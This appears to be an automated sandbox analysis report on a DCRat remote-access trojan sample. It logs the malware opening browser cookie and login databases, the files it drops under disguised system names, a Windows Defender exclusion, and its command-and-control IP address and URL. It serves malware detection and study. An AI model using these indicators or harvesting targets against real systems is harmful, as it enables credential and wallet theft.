Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal

Remote Access Functionality
barindex
Yara detected DCRat
Source: Yara match File source: fDTPlvsGfH.exe, type: SAMPLE
Source: Yara match File source: 0.0.fDTPlvsGfH.exe.60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1623414051.0000000000062000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2890315782.0000000002D96000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: fDTPlvsGfH.exe PID: 6168, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe PID: 7744, type: MEMORYSTR
Source: Yara match File source: C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, type: DROPPED
Source: Yara match File source: C:\Windows\Downloaded Program Files\MoUsoCoreWorker.exe, type: DROPPED
Source: Yara match File source: C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, type: DROPPED
Source: Yara match File source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\csrss.exe, type: DROPPED
Source: Yara match File source: C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, type: DROPPED
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1428989 Sample: fDTPlvsGfH.exe Startdate: 20/04/2024 Architecture: WINDOWS Score: 100 68 Snort IDS alert for network traffic 2->68 70 Antivirus detection for URL or domain 2->70 72 Antivirus detection for dropped file 2->72 74 13 other signatures 2->74 7 fDTPlvsGfH.exe 4 46 2->7         started        11 svchost.exe 2->11         started        process3 dnsIp4 44 C:\Windows\...\MoUsoCoreWorker.exe, PE32 7->44 dropped 46 C:\Users\user\Desktop\wlEHTDRh.log, PE32 7->46 dropped 48 C:\Users\user\Desktop\uodzyDCn.log, PE32 7->48 dropped 50 28 other malicious files 7->50 dropped 76 Detected unpacking (creates a PE file in dynamic memory) 7->76 78 Found many strings related to Crypto-Wallets (likely being stolen) 7->78 80 Adds a directory exclusion to Windows Defender 7->80 82 2 other signatures 7->82 14 cmd.exe 7->14         started        16 powershell.exe 23 7->16         started        19 powershell.exe 7->19         started        21 3 other processes 7->21 62 127.0.0.1 unknown unknown 11->62 file5 signatures6 process7 signatures8 23 nRlqAJqnLtuwljTOfeVJPERQcpcS.exe 14->23         started        28 conhost.exe 14->28         started        42 2 other processes 14->42 64 Found many strings related to Crypto-Wallets (likely being stolen) 16->64 66 Loading BitLocker PowerShell Module 16->66 30 conhost.exe 16->30         started        32 conhost.exe 19->32         started        34 WmiPrvSE.exe 19->34         started        36 conhost.exe 21->36         started        38 conhost.exe 21->38         started        40 conhost.exe 21->40         started        process9 dnsIp10 60 109.107.182.145, 49730, 49731, 49732 TELEPORT-TV-ASRU Russian Federation 23->60 52 C:\Users\user\Desktop\zZCPRjnE.log, PE32 23->52 dropped 54 C:\Users\user\Desktop\wiMZKnmL.log, PE32 23->54 dropped 56 C:\Users\user\Desktop\wacGgDMF.log, PE32 23->56 dropped 58 22 other malicious files 23->58 dropped 84 Found many strings related to Crypto-Wallets (likely being stolen) 23->84 86 Tries to harvest and steal browser information (history, passwords, etc) 23->86 file11 signatures12
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
109.107.182.145
 unknown Russian Federation
49973 TELEPORT-TV-ASRU true

Private

IP
127.0.0.1

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://109.107.182.145/ExternalVm_CpuGameWindows.php true
    		unknown